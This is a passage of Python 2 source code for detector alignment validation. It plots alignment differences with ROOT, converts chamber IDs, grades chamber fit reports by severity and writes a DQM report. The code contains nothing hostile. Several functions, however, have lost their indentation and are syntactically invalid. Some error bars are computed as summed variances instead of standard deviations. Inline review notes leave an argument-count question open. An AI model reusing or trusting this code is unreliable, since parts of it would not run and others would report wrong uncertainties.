                        getvalues["phiy"].append((fill, 10. * sqrt(r1.deltaphiy.error**2 + r2.deltaphiy.error**2)))
                # phiz
                if r1.deltaphiz is not None and r2.deltaphiz is not None and r1.deltaphiz.error is not None and \
                   r2.deltaphiz.error is not None and (r1.deltaphiz.error**2 + r2.deltaphiz.error**2) > 0.:
                    delta = db1.phiz - db2.phiz
                    if reportdiff: delta -= r1.deltaphiz.value
                    if normalized:
                        fill = delta/sqrt(r1.deltaphiz.error**2 + r2.deltaphiz.error**2)
                    else:
                        fill = delta * 1000.
                    hphiz.Fill(fill)
                    if getvalues not in (False, None):
                        getvalues["phiz"].append((fill, 10. * sqrt(r1.deltaphiz.error**2 + r2.deltaphiz.error**2)))
    # axis titles: plain deltas, XML-minus-report differences, or pulls
    if not normalized:
        if phi:
            hx.SetXTitle("#delta_{#phi} position (mrad)")
        else:
            hx.SetXTitle("#delta_{x'} (mm)")
        hy.SetXTitle("#delta_{y'} (mm)")
        hz.SetXTitle("#delta_{z'} (mm)")
        hphix.SetXTitle("#delta_{#phi_{x}} (mrad)")
        hphiy.SetXTitle("#delta_{#phi_{y}} (mrad)")
        hphiz.SetXTitle("#delta_{#phi_{z}} (mrad)")
        if reportdiff:
            if phi:
                hx.SetXTitle("#delta_{#phi}(XML) - #delta_{#phi}(report) position (mrad)")
            else:
                hx.SetXTitle("#delta_{x'}(XML) - #delta_{x'}(report) (mm)")
            hy.SetXTitle("#delta_{y'}(XML) - #delta_{y'}(report) (mm)")
            hz.SetXTitle("#delta_{z'}(XML) - #delta_{z'}(report) (mm)")
            hphix.SetXTitle("#delta_{#phi_{x}}(XML) - #delta_{#phi_{x}}(report) (mrad)")
            hphiy.SetXTitle("#delta_{#phi_{y}}(XML) - #delta_{#phi_{y}}(report) (mrad)")
            hphiz.SetXTitle("#delta_{#phi_{z}}(XML) - #delta_{#phi_{z}}(report) (mrad)")
    else:
        if phi:
            hx.SetXTitle("#delta_{#phi}/#sigma_{#phi} position")
        else:
            hx.SetXTitle("#delta_{x'}/#sigma_{x'}")
        hy.SetXTitle("#delta_{y'}/#sigma_{y'}")
        hz.SetXTitle("#delta_{z'}/#sigma_{z'}")
        hphix.SetXTitle("#delta_{#phi_{x}}/#sigma_{#phi_{x}}")
        hphiy.SetXTitle("#delta_{#phi_{y}}/#sigma_{#phi_{y}}")
        hphiz.SetXTitle("#delta_{#phi_{z}}/#sigma_{#phi_{z}}")
    for h in hx, hy, hz, hphix, hphiy, hphiz:
        h.GetXaxis().CenterTitle()
        h.GetYaxis().CenterTitle()
        h.SetFillColor(color)
        h.SetLineStyle(style)
    if canvas is not None: c = canvas
    else: c = c1
    if normalized:
        # overlay a unit Gaussian scaled to each histogram's population
        fx = ROOT.TF1("fx", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hx.GetEntries()*2.*window/bins), -window, window)
        fy = ROOT.TF1("fy", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hy.GetEntries()*2.*window/bins), -window, window)
        fz = ROOT.TF1("fz", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hz.GetEntries()*2.*window/bins), -window, window)
        fphix = ROOT.TF1("fphix", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hphix.GetEntries()*2.*window/bins), -window, window)
        fphiy = ROOT.TF1("fphiy", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hphiy.GetEntries()*2.*window/bins), -window, window)
        fphiz = ROOT.TF1("fphiz", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hphiz.GetEntries()*2.*window/bins), -window, window)
        for f in fx, fy, fz, fphix, fphiy, fphiz:
            f.SetLineWidth(2)
            f.SetLineColor(ROOT.kBlue)
        for h, f in (hx, fx), (hy, fy), (hz, fz), (hphix, fphix), (hphiy, fphiy), (hphiz, fphiz):
            h.SetAxisRange(0, 1.1*max(h.GetMaximum(), f.GetMaximum()), "Y")
        c.Clear()
        c.Divide(3, 2)
        c.GetPad(1).cd(); hx.Draw(); fx.Draw("same")
        c.GetPad(2).cd(); hy.Draw(); fy.Draw("same")
        c.GetPad(3).cd(); hz.Draw(); fz.Draw("same")
        c.GetPad(4).cd(); hphix.Draw(); fphix.Draw("same")
        c.GetPad(5).cd(); hphiy.Draw(); fphiy.Draw("same")
        c.GetPad(6).cd(); hphiz.Draw(); fphiz.Draw("same")
        return hx, hy, hz, hphix, hphiy, hphiz, fx, fy, fz, fphix, fphiy, fphiz
    else:
        nvar = 6
        c.Clear()
        if nvar == 4: c.Divide(2, 2)
        if nvar == 6: c.Divide(3, 2)
        c.GetPad(1).cd(); hx.Draw()
        c.GetPad(2).cd(); hy.Draw()
        if nvar == 4:
            c.GetPad(3).cd(); hphiy.Draw()
            c.GetPad(4).cd(); hphiz.Draw()
        if nvar == 6:
            c.GetPad(3).cd(); hz.Draw()
            c.GetPad(4).cd(); hphix.Draw()
            c.GetPad(5).cd(); hphiy.Draw()
            c.GetPad(6).cd(); hphiz.Draw()
        if inlog:
            # log scale only on pads that actually have entries
            if hx.GetEntries()>0: c.GetPad(1).SetLogy(1)
            if hy.GetEntries()>0: c.GetPad(2).SetLogy(1)
            if nvar == 4:
                if hphiy.GetEntries()>0: c.GetPad(3).SetLogy(1)
                if hphiz.GetEntries()>0: c.GetPad(4).SetLogy(1)
            if nvar == 6:
                if hz.GetEntries()>0: c.GetPad(3).SetLogy(1)
                if hphix.GetEntries()>0: c.GetPad(4).SetLogy(1)
                if hphiy.GetEntries()>0: c.GetPad(5).SetLogy(1)
                if hphiz.GetEntries()>0: c.GetPad(6).SetLogy(1)
        return hx, hy, hz, hphix, hphiy, hphiz
def DBMCVersus(quantity, versus, database, reports, window=10., selection=None, color=ROOT.kBlack):
    """Plot one alignment quantity versus a geometric coordinate, comparing
    `database` against MC truth (second database/report set = None)."""
    return DBdiffVersus(quantity, versus, database, None, reports, None, window, selection, color)

def DBdiffVersus(quantity, versus, database1, database2, reports1, reports2, window=10., selection=None, color=ROOT.kBlack):
    """Plot a database1 - database2 alignment difference versus position.

    quantity -- one of "phi", "x", "y", "z", "phix", "phiy", "phiz"
    versus   -- abscissa: "r", "phi" or "z" (from signConventions)
    window   -- half-range of the y axis
    selection-- optional predicate over postal-address fields
    color    -- marker/line color of the TGraphErrors

    Fix: the signature previously read `windwselection=None` -- the
    `window` and `selection` parameters accidentally merged into one --
    so the body's references to `window`/`selection` raised NameError and
    DBMCVersus's 9-argument call raised TypeError.  Restored the intended
    `window=10., selection=None`.

    Returns (background histogram, TGraphErrors, domain, values, errors).
    """
    tdrStyle.SetOptStat("")
    domain = []
    values = []
    errors = []
    for r1 in reports1:
        # apply the selection only when its arity matches this address
        if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
            if reports2 is None:
                # no second report set: build an all-zero stand-in report
                # NOTE(review): one fewer trailing 0. than the equivalent
                # call in DBdiff -- confirm which arity add_parameters wants
                r2 = Report(r1.chamberId, r1.postal_address, r1.name)
                r2.add_parameters(ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.),
                                  ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.), 0., 0., 0.)
            else:
                found = False
                for r2 in reports2:
                    if r1.postal_address == r2.postal_address:
                        found = True
                        break
                if not found: continue
            found = False
            if r1.postal_address[0] == "DT":
                if r1.postal_address[1:] in database1.dt:
                    found = True
                    db1 = database1.dt[r1.postal_address[1:]]
                    if database2 is None:
                        # compare against a zeroed-out alignable
                        db2 = DTAlignable()
                        db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
                        db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
                    else:
                        db2 = database2.dt[r1.postal_address[1:]]
            else:
                if r1.postal_address[1:] in database1.csc:
                    found = True
                    db1 = database1.csc[r1.postal_address[1:]]
                    if database2 is None:
                        db2 = CSCAlignable()
                        db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
                        db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
                    else:
                        db2 = database2.csc[r1.postal_address[1:]]
            if found and r1.status == "PASS" and r2.status == "PASS":
                okay = False
                if quantity == "phi":
                    if r1.deltax is not None and r2.deltax is not None and r1.deltax.error is not None and \
                       r2.deltax.error is not None and (r1.deltax.error**2 + r2.deltax.error**2) > 0.:
                        okay = True
                        values.append((db1.x - db2.x)/
                                      signConventions[r1.postal_address][3] * 1000. * signConventions[r1.postal_address][0])
                        errors.append((r1.deltax.error**2 + r2.deltax.error**2)/
                                      signConventions[r1.postal_address][3] * 1000. * signConventions[r1.postal_address][0])
                elif quantity == "x":
                    if r1.deltax is not None and r2.deltax is not None and r1.deltax.error is not None and \
                       r2.deltax.error is not None and (r1.deltax.error**2 + r2.deltax.error**2) > 0.:
                        okay = True
                        values.append((db1.x - db2.x) * 10. * signConventions[r1.postal_address][0])
                        errors.append((r1.deltax.error**2 + r2.deltax.error**2) * 10. * signConventions[r1.postal_address][0])
                elif quantity == "y":
                    if r1.deltay is not None and r2.deltay is not None and r1.deltay.error is not None and \
                       r2.deltay.error is not None and (r1.deltay.error**2 + r2.deltay.error**2) > 0.:
                        okay = True
                        values.append((db1.y - db2.y) * 10. * signConventions[r1.postal_address][1])
                        errors.append((r1.deltay.error**2 + r2.deltay.error**2) * 10. * signConventions[r1.postal_address][1])
                elif quantity == "z":
                    if r1.deltaz is not None and r2.deltaz is not None and r1.deltaz.error is not None and \
                       r2.deltaz.error is not None and (r1.deltaz.error**2 + r2.deltaz.error**2) > 0.:
                        okay = True
                        values.append((db1.z - db2.z) * 10. * signConventions[r1.postal_address][2])
                        errors.append((r1.deltaz.error**2 + r2.deltaz.error**2) * 10. * signConventions[r1.postal_address][2])
                elif quantity == "phix":
                    if r1.deltaphix is not None and r2.deltaphix is not None and r1.deltaphix.error is not None and \
                       r2.deltaphix.error is not None and (r1.deltaphix.error**2 + r2.deltaphix.error**2) > 0.:
                        okay = True
                        values.append((db1.phix - db2.phix) * 1000.)
                        errors.append((r1.deltaphix.error**2 + r2.deltaphix.error**2) * 1000.)
                elif quantity == "phiy":
                    if r1.deltaphiy is not None and r2.deltaphiy is not None and r1.deltaphiy.error is not None and \
                       r2.deltaphiy.error is not None and (r1.deltaphiy.error**2 + r2.deltaphiy.error**2) > 0.:
                        okay = True
                        values.append((db1.phiy - db2.phiy) * 1000.)
                        errors.append((r1.deltaphiy.error**2 + r2.deltaphiy.error**2) * 1000.)
                elif quantity == "phiz":
                    if r1.deltaphiz is not None and r2.deltaphiz is not None and r1.deltaphiz.error is not None and \
                       r2.deltaphiz.error is not None and (r1.deltaphiz.error**2 + r2.deltaphiz.error**2) > 0.:
                        okay = True
                        values.append((db1.phiz - db2.phiz) * 1000.)
                        errors.append((r1.deltaphiz.error**2 + r2.deltaphiz.error**2) * 1000.)
                else: raise Exception
                if okay:
                    if versus == "r": domain.append(signConventions[r1.postal_address][3])
                    elif versus == "phi": domain.append(signConventions[r1.postal_address][4])
                    elif versus == "z": domain.append(signConventions[r1.postal_address][5])
                    else: raise Exception
    # empty background histogram defining the axes
    if versus == "r":
        bkgndhist = ROOT.TH1F("bkgndhist", "", 100, 0., 800.)
        bkgndhist.SetXTitle("R (cm)")
    elif versus == "phi":
        bkgndhist = ROOT.TH1F("bkgndhist", "", 100, -pi, pi)
        bkgndhist.SetXTitle("#phi (rad)")
    elif versus == "z":
        bkgndhist = ROOT.TH1F("bkgndhist", "", 100, -1100., 1100.)
        bkgndhist.SetXTitle("z (cm)")
    bkgndhist.GetXaxis().CenterTitle()
    bkgndhist.SetAxisRange(-window, window, "Y")
    if quantity == "phi": bkgndhist.SetYTitle("#delta_{#phi} position (mrad)")
    elif quantity == "x": bkgndhist.SetYTitle("#delta_{x'} (mm)")
    elif quantity == "y": bkgndhist.SetYTitle("#delta_{y'} (mm)")
    elif quantity == "z": bkgndhist.SetYTitle("#delta_{z'} (mm)")
    elif quantity == "phix": bkgndhist.SetYTitle("#delta_{#phi_{x}} (mrad)")
    elif quantity == "phiy": bkgndhist.SetYTitle("#delta_{#phi_{y}} (mrad)")
    elif quantity == "phiz": bkgndhist.SetYTitle("#delta_{#phi_{z}} (mrad)")
    else: raise Exception
    bkgndhist.GetYaxis().CenterTitle()
    if len(domain) == 0:
        tgraph = ROOT.TGraphErrors(0)
    else:
        tgraph = ROOT.TGraphErrors(len(domain), array.array("d", domain), array.array("d", values),
                                   array.array("d", [0.]*len(domain)), array.array("d", errors))
    tgraph.SetMarkerColor(color)
    tgraph.SetLineColor(color)
    bkgndhist.Draw()
    if tgraph.GetN() > 0: tgraph.Draw("p")
    return bkgndhist, tgraph, domain, values, errors
######################################################################################################
def idToPostalAddress(id):
    """Convert a cell id string like "MB-1/2/05" or "ME+2/1/11" into a
    postal-address tuple ("DT", wheel, station, sector) or
    ("CSC", endcap, station, ring, chamber).  Returns None for anything
    that does not name a valid single chamber."""
    # only len==9 ids can correspond to valid postal address
    if len(id)!=9: return None
    if id[0:2]=="MB":
        pa = ("DT", int(id[2:4]), int(id[5]), int(id[7:9]))
        if pa[1]<-2 or pa[1]>2: return None
        if pa[2]>4: return None
        # sectors 13 and 14 exist only in station 4; stations 1-3 have 12.
        # (Fixed: the old check compared the *sector* to 4, which made the
        # second clause always False and let e.g. MB+1/3/13 through.)
        if pa[3]<1 or pa[3]>14 or (pa[2]!=4 and pa[3]>12): return None
        return pa
    elif id[0:2]=="ME":
        if id[2]=="+": ec=1
        elif id[2]=="-": ec=2
        else: return None
        pa = ("CSC", ec, int(id[3]), int(id[5]), int(id[7:9]))
        if pa[2]<1 or pa[2]>4: return None
        # stations 2-4 only have rings 1 and 2
        if pa[3]<1 or pa[3]>4 or (pa[2]>1 and pa[3]>2): return None
        # inner rings of stations 2-4 have 18 chambers, all others 36
        if pa[4]<1 or pa[4]>36 or (pa[2]>1 and pa[3]==1 and pa[4]>18): return None
        return pa
    else: return None
def postalAddressToId(postal_address):
    """Inverse of idToPostalAddress: format a postal-address tuple as an
    id string ("MB<wheel>/<station>/<sector>" or "ME<station>/<ring>/<chamber>").
    Returns None for an unrecognized detector type."""
    system = postal_address[0]
    if system == "DT":
        wheel, station, sector = postal_address[1:]
        signed_wheel = "%+d" % wheel
        # wheel zero is conventionally written "-0" in these ids
        if signed_wheel == "+0": signed_wheel = "-0"
        return "MB%s/%d/%02d" % (signed_wheel, station, sector)
    if system == "CSC":
        endcap, station, ring, chamber = postal_address[1:]
        # the minus endcap is encoded as a negative station number
        signed_station = station if endcap == 1 else -abs(station)
        return "ME%+d/%d/%02d" % (signed_station, ring, chamber)
    return None
def nameToId(name):
    """Translate a chamber label such as "MBwhAst1sec01" or "MEp11_02" into
    an id string ("MB-2/1/01", "ME+1/1/02").  Returns "" when the wheel or
    endcap code is malformed and None when the prefix is unrecognized."""
    if name.startswith("MB"):
        # wheel letters A..E map onto wheels -2..+2 (C is the "-0" wheel)
        wheel_codes = {"A": "-2", "B": "-1", "C": "-0", "D": "+1", "E": "+2"}
        if name[4] not in wheel_codes: return ""
        return "MB%s/%s/%s" % (wheel_codes[name[4]], name[7], name[11:13])
    if name.startswith("ME"):
        endcap_codes = {"p": "+", "m": "-"}
        if name[2] not in endcap_codes: return ""
        return "ME%s%s/%s/%s" % (endcap_codes[name[2]], name[3], name[4], name[6:8])
    return None
def availableCellsDT(reports):
    """Build the list of DT cell ids for the DQM navigation tree.

    The list contains, in order: whole wheels, wheel/station pairs,
    station/sector pairs (from the "ALL"-wheel entries of DT_TYPES),
    station-with-all-sectors entries, and finally individual chambers.
    A chamber is included only if `reports` contains a usable fit report
    for it (not NOFIT, not TOOFEWHITS-with-zero-segments); with an empty
    `reports` list no chambers are included at all.

    NOTE(review): the layout of the global DT_TYPES tuples (index 0 = cell
    prefix, 1 = wheel code or "ALL", 2 = station list) is assumed from the
    indexing below -- confirm against the DT_TYPES definition."""
    dts = []
    # DT wheels
    for iwheel in DT_TYPES:
        if iwheel[1]=="ALL": continue
        dts.append(iwheel[0])
    # DT wheel & station
    for wheel in DT_TYPES:
        if wheel[1]=="ALL": continue
        for station in wheel[2]:
            dts.append(wheel[0]+'/'+station[1])
    # DT station & sector
    for wheel in DT_TYPES:
        if wheel[1]!="ALL": continue
        for station in wheel[2]:
            for sector in range(1,station[2]+1):
                ssector = "%02d" % sector
                dts.append(wheel[0]+'/'+station[1]+'/'+ssector)
    # DT station & ALL sectors
    for wheel in DT_TYPES:
        if wheel[1]!="ALL": continue
        for station in wheel[2]:
            dts.append(wheel[0]+'/'+station[1])
    # DT chambers
    for wheel in DT_TYPES:
        if wheel[1]=="ALL": continue
        for station in wheel[2]:
            for sector in range(1,station[2]+1):
                ssector = "%02d" % sector
                label = "MBwh%sst%ssec%s" % (wheelLetter(int(wheel[1])),station[1],ssector)
                if len(reports)==0:
                    # no reports case: do not include chambers
                    #dts.append(wheel[0]+'/'+station[1]+'/'+ssector)
                    continue
                found = False
                for r in reports:
                    if r.name == label:
                        found = True
                        break
                if not found: continue
                # `r` is the matching report left over from the search loop
                if r.status == "TOOFEWHITS" and r.posNum+r.negNum==0: continue
                if r.status == "NOFIT": continue
                dts.append(wheel[0]+'/'+station[1]+'/'+ssector)
    return dts
def availableCellsCSC(reports):
    """Build the list of CSC cell ids for the DQM navigation tree.

    The list contains, in order: stations, station/ring pairs,
    station/chamber pairs (across all rings), station-with-all-chambers
    entries, and finally individual chambers.  A chamber is included only
    if `reports` contains a usable fit report for it; with an empty
    `reports` list no chambers are included.  Non-instrumented ME4/2
    chambers (all of ME-4/2, and ME+4/2 outside chambers 9-13) are skipped.

    NOTE(review): the layout of the global CSC_TYPES tuples (index 0 = cell
    prefix, 1 = endcap code, 2 = station list, each station carrying a ring
    list) is assumed from the indexing below -- confirm against CSC_TYPES."""
    cscs = []
    # CSC station
    for endcap in CSC_TYPES:
        for station in endcap[2]:
            cscs.append("%s%s" % (endcap[0], station[1]))
    # CSC station & ring
    for endcap in CSC_TYPES:
        for station in endcap[2]:
            for ring in station[2]:
                if ring[1]=="ALL": continue
                #label = "CSCvsphi_me%s%s%s" % (endcap[1], station[1], ring[1])
                cscs.append("%s%s/%s" % (endcap[0], station[1],ring[1]))
    # CSC station and chamber
    for endcap in CSC_TYPES:
        for station in endcap[2]:
            for ring in station[2]:
                if ring[1]!="ALL": continue
                for chamber in range(1,ring[2]+1):
                    #label = "CSCvsr_me%s%sch%02d" % (endcap[1], station[1], chamber)
                    cscs.append("%s%s/ALL/%02d" % (endcap[0], station[1],chamber))
    # CSC station and ALL chambers
    for endcap in CSC_TYPES:
        for station in endcap[2]:
            for ring in station[2]:
                if ring[1]!="ALL": continue
                #label = "CSCvsr_me%s%schALL" % (endcap[1], station[1])
                cscs.append("%s%s/ALL" % (endcap[0], station[1]))
    # CSC chambers
    for endcap in CSC_TYPES:
        for station in endcap[2]:
            for ring in station[2]:
                if ring[1]=="ALL": continue
                for chamber in range(1,ring[2]+1):
                    # exclude non instrumented ME4/2
                    if station[1]=="4" and ring[1]=="2":
                        if endcap[1]=="m": continue
                        if chamber<9 or chamber>13: continue
                    schamber = "%02d" % chamber
                    label = "ME%s%s%s_%s" % (endcap[1], station[1], ring[1], schamber)
                    if len(reports)==0:
                        # no reports case: do not include chambers
                        #cscs.append(endcap[0]+station[1]+'/'+ring[1]+'/'+schamber)
                        continue
                    found = False
                    for r in reports:
                        if r.name == label:
                            found = True
                            break
                    if not found: continue
                    # `r` is the matching report left over from the search loop
                    if r.status == "TOOFEWHITS" and r.posNum+r.negNum==0: continue
                    if r.status == "NOFIT": continue
                    cscs.append(endcap[0]+station[1]+'/'+ring[1]+'/'+schamber)
    return cscs
# Severity scale for DQM test results.  Each entry maps a severity name to
# its numeric rank ("idx", higher is worse) and to the color (HTML color
# name plus hex code) used to paint cells of that severity in the web report.
DQM_SEVERITY = [
    {"idx":0, "name": "NONE", "color": "lightgreen", "hex":"#90EE90"},
    {"idx":1, "name": "LOWSTAT05", "color": "lightgreen", "hex":"#96D953"},
    {"idx":2, "name": "LOWSTAT075", "color": "lightgreen", "hex":"#94E26F"},
    {"idx":3, "name": "LOWSTAT1", "color": "yellowgreen", "hex":"#9ACD32"},
    {"idx":4, "name": "LOWSTAT", "color": "yellow", "hex":"#FFFF00"},
    {"idx":5, "name": "TOLERABLE", "color": "lightpink", "hex":"#FFB6C1"},
    {"idx":6, "name": "SEVERE", "color": "orange", "hex":"#FFA500"},
    {"idx":7, "name": "CRITICAL", "color": "red", "hex":"#FF0000"}];
def addToTestResults(c,res):
    """Append the test-result entries `res` for cell id `c` to the global
    TEST_RESULTS map, creating the cell's list on first use.  Cells with an
    empty result list are deliberately left absent from the map."""
    if len(res)>0:
        # setdefault avoids the membership-test / double-lookup pattern
        TEST_RESULTS.setdefault(c, []).extend(res)
def testEntry(testID,scope,descr,severity):
    """Build one test-result record for the DQM report, translating the
    severity name into its numeric index from DQM_SEVERITY (unknown names
    fall back to index 0)."""
    matches = (entry["idx"] for entry in DQM_SEVERITY if entry["name"] == severity)
    idx = next(matches, 0)
    return {"testID": testID, "scope": scope, "descr": descr, "severity": idx}
def testZeroWithin5Sigma(x):
if abs(x[1])==0.: return 0.
pull = abs(x[0])/abs(x[1])
if pull <= 5: return 0.
else: return pull
def testDeltaWithin5Sigma(x,sx):
n = len(x)
res = []
dr = []
#print x
#print sx
for i in range(1,n+1):
x1 = x[i-1]
sx1 = sx[i-1]
x2 = x[0]
sx2 = sx[0]
if i<n:
x2 = x[i]
sx2 = sx[i]
sig1 = sqrt( (sx1[0]-sx1[1])**2 + x1[1]**2 )
sig2 = sqrt( (sx2[0]-sx2[1])**2 + x2[1]**2 )
df = abs(x1[0]-x2[0]) - 3*( sig1 + sig2 )
#df = abs(sx1[1]-sx2[0]) - 5*(abs(x1[1]) + abs(x2[1]))
#print i, df, '= abs(',sx1[1],'-',sx2[0],')-5*(abs(',x1[1],')+abs(',x2[1],'))'
dr.append(df)
if df > 0: res.append(i)
#print dr
#print res
return res
def doTestsForReport(cells,reports):
    """Run per-chamber quality tests against the alignment fit reports.

    For every cell id in `cells` that names a single chamber and has a
    matching entry in `reports`, severity-graded findings (fit failures,
    low statistics, large chi2, large medians, large final residuals) are
    appended to the global TEST_RESULTS map via addToTestResults."""
    for c in cells:
        # can a cell be converted to a chamber postal address?
        postal_address = idToPostalAddress(c)
        if not postal_address: continue
        # is this chamber in _report?
        found = False
        for r in reports:
            if r.postal_address == postal_address:
                found = True
                break
        if not found: continue
        # chamber's tests result; `r` below is the report found above
        res = []
        scope = postal_address[0]
        # noting could be done if fitting fails
        if r.status == "FAIL" or r.status == "MINUITFAIL":
            res.append(testEntry("FAILURE",scope,r.status+" failure","CRITICAL"))
            addToTestResults(c,res)
            continue
        # noting could be done if TOOFEWHITS
        nseg = r.posNum + r.negNum
        if r.status == "TOOFEWHITS" and nseg>0:
            res.append(testEntry("LOW_STAT",scope,"low stat, #segments=%d"%nseg,"LOWSTAT"))
            addToTestResults(c,res)
            continue
        # set shades of light green according to sidma(dx), converted to mm
        sdx = 10.*r.deltax.error
        if sdx>0.5:
            if sdx<0.75: res.append(testEntry("LOW_STAT_DDX05",scope,"low stat, delta(dx)=%f #segments=%d" % (sdx,nseg),"LOWSTAT05"))
            elif sdx<1.: res.append(testEntry("LOW_STAT_DDX075",scope,"low stat, delta(dx)=%f #segments=%d" % (sdx,nseg),"LOWSTAT075"))
            else: res.append(testEntry("LOW_STAT_DDX1",scope,"low stat, delta(dx)=%f #segments=%d" % (sdx,nseg),"LOWSTAT1"))
        # check chi2
        if r.redchi2 > 20.: #2.5:
            res.append(testEntry("BIG_CHI2",scope,"chi2=%f>20" % r.redchi2,"TOLERABLE"))
        # check medians (converted to mm / mrad)
        medx, meddx = 10.*r.median_x, 1000.*r.median_dxdz
        #medy, meddy = 10.*r.median_y, 1000.*r.median_dydz
        if medx>2: res.append(testEntry("BIG_MED_X",scope,"median dx=%f>2 mm"%medx,"SEVERE"))
        #if medy>3: res.append(testEntry("BIG_MED_Y",scope,"median dy=%f>3 mm"%medy,"SEVERE"))
        if meddx>2: res.append(testEntry("BIG_MED_DXDZ",scope,"median d(dx/dz)=%f>2 mrad"%meddx,"SEVERE"))
        #if meddy>3: res.append(testEntry("BIG_MED_DYDZ",scope,"median d(dy/dz)=%f>3 mrad"%meddy,"SEVERE"))
        # check residuals far from zero; DT station 4 has no y measurement,
        # so dy is left at 0 there
        isDTst4 = False
        if postal_address[0] == "DT" and postal_address[2]==4: isDTst4 = True
        dx, dy, dpy, dpz = 10.*r.deltax.value, 0., 1000.*r.deltaphiy.value, 1000.*r.deltaphiz.value
        if not isDTst4: dy = 10.*r.deltay.value
        if dx>0.2: res.append(testEntry("BIG_LAST_ITR_DX",scope,"dx=%f>0.2 mm"%dx,"CRITICAL"))
        if dy>0.2: res.append(testEntry("BIG_LAST_ITR_DY",scope,"dy=%f>0.2 mm"%dy,"CRITICAL"))
        if dpy>0.2: res.append(testEntry("BIG_LAST_ITR_DPHIY",scope,"dphiy=%f>0.2 mrad"%dpy,"CRITICAL"))
        if dpz>0.2: res.append(testEntry("BIG_LAST_ITR_DPHIZ",scope,"dphiz=%f>0.2 mrad"%dpz,"CRITICAL"))
        #if ddx>0.03: res.append(testEntry("BIG_DX",scope,"dphix=%f>0.03 mrad"%ddx,"CRITICAL"))
        addToTestResults(c,res)
def doTestsForMapPlots(cells):
    """Run quality tests on the map-plot fit results.

    For every cell id in `cells`, checks the sine-fit coefficients stored in
    MAP_RESULTS_FITSIN (any coefficient more than 5 sigma from zero ->
    SEVERE) and the sawtooth-fit results in MAP_RESULTS_SAWTOOTH
    (discontinuities -> SEVERE, non-zero slopes -> TOLERABLE), appending
    findings to TEST_RESULTS.  Returns None early on a malformed cell id."""
    for c in cells:
        res = []
        # scope is derived from the id prefix: MB -> DT, ME -> CSC
        scope = "zzz"
        if c[0:2]=="MB": scope = "DT"
        if c[0:2]=="ME": scope = "CSC"
        if scope == "zzz":
            print "strange cell ID: ", c
            return None
        if c in MAP_RESULTS_FITSIN:
            t = MAP_RESULTS_FITSIN[c]
            t_a = testZeroWithin5Sigma(t['a'])
            t_s = testZeroWithin5Sigma(t['sin'])
            t_c = testZeroWithin5Sigma(t['cos'])
            if t_a+t_s+t_c >0:
                descr = "map fitsin 5 sigma away from 0; pulls : a=%.2f sin=%.2f, cos=%.2f" % (t_a,t_s,t_c)
                res.append(testEntry("MAP_FITSIN",scope,descr,"SEVERE"))
        if c in MAP_RESULTS_SAWTOOTH:
            t = MAP_RESULTS_SAWTOOTH[c]
            t_a = testDeltaWithin5Sigma(t['a'],t['da'])
            if len(t_a)>0:
                descr = "map discontinuities: %s" % ",".join(map(str,t_a))
                res.append(testEntry("MAP_DISCONTIN",scope,descr,"SEVERE"))
            # slopes of the sawtooth segments, tested against zero
            t_b = map(testZeroWithin5Sigma, t['b'])
            t_bi = []
            for i in range(0,len(t_b)):
                if t_b[i]>0: t_bi.append(i+1)
            if len(t_bi)>0:
                descr = "map sawteeth: %s" % ",".join(map(str,t_bi))
                res.append(testEntry("MAP_SAWTEETH",scope,descr,"TOLERABLE"))
        addToTestResults(c,res)
def saveTestResultsMap(run_name):
    """Pickle the global map-plot fit results to
    tmp_test_results_map__<run_name>.pkl (sawtooth first, then fitsin --
    loadTestResultsMap reads them back in the same order).  No-op when
    both result maps are empty."""
    if len(MAP_RESULTS_SAWTOOTH)+len(MAP_RESULTS_FITSIN)==0: return None
    # context manager guarantees the file is closed even if pickling fails
    with open("tmp_test_results_map__%s.pkl" % run_name, "wb") as ff:
        pickle.dump(MAP_RESULTS_SAWTOOTH, ff)
        pickle.dump(MAP_RESULTS_FITSIN, ff)
def loadTestResultsMap(run_name):
print "tmp_test_results_map__%s.pkl" % run_name, os.access("tmp_test_results_map__%s.pkl" % run_name,os.F_OK)
if not os.access("tmp_test_results_map__%s.pkl" % run_name,os.F_OK): return None
global MAP_RESULTS_FITSIN, MAP_RESULTS_SAWTOOTH
ff = open("tmp_test_results_map__%s.pkl" % run_name, "rb")
MAP_RESULTS_SAWTOOTH = pickle.load(ff)
MAP_RESULTS_FITSIN = pickle.load(ff)
ff.close()
#execfile("tmp_test_results_map__%s.py" % run_name)
#print 'asasas', MAP_RESULTS_FITSIN
return True
def writeDQMReport(fname_dqm, run_name):
    """Dump the accumulated TEST_RESULTS as a JavaScript-loadable DQM report
    file: a `var DQM_REPORT = ` prefix followed by the JSON payload with the
    run name and a generation timestamp."""
    tests = [{"objID": c, "name": c, "list": TEST_RESULTS[c]} for c in TEST_RESULTS]
    lt = time.localtime(time.time())
    lts = "%04d-%02d-%02d %02d:%02d:%02d %s" % (lt[0], lt[1], lt[2], lt[3], lt[4], lt[5], time.tzname[1])
    dqm_report = {"run": run_name, "genDate": lts, "report": tests}
    ff = open(fname_dqm, mode="w")
    ff.write("var DQM_REPORT = \n")
    json.dump(dqm_report, ff)
    ff.close()
def doTests(reports, pic_ids, fname_base, fname_dqm, run_name):
    """Top-level DQM driver: determine the available DT and CSC cells,
    write the muon navigation list to `fname_base`, run the report-based
    and map-based tests, and write the DQM report to `fname_dqm`."""
    # find available baseline
    dts, cscs = [], []
    if len(reports) > 0:
        dts = availableCellsDT(reports)
        cscs = availableCellsCSC(reports)
    elif len(pic_ids) > 0:
        dts = [cell for cell in pic_ids if 'MB' in cell]
        cscs = [cell for cell in pic_ids if 'ME' in cell]
    mulist = ['Run: ' + run_name, ['ALL', ['MU']], ['DT', dts], ['CSC', cscs]]
    ff = open(fname_base, mode="w")
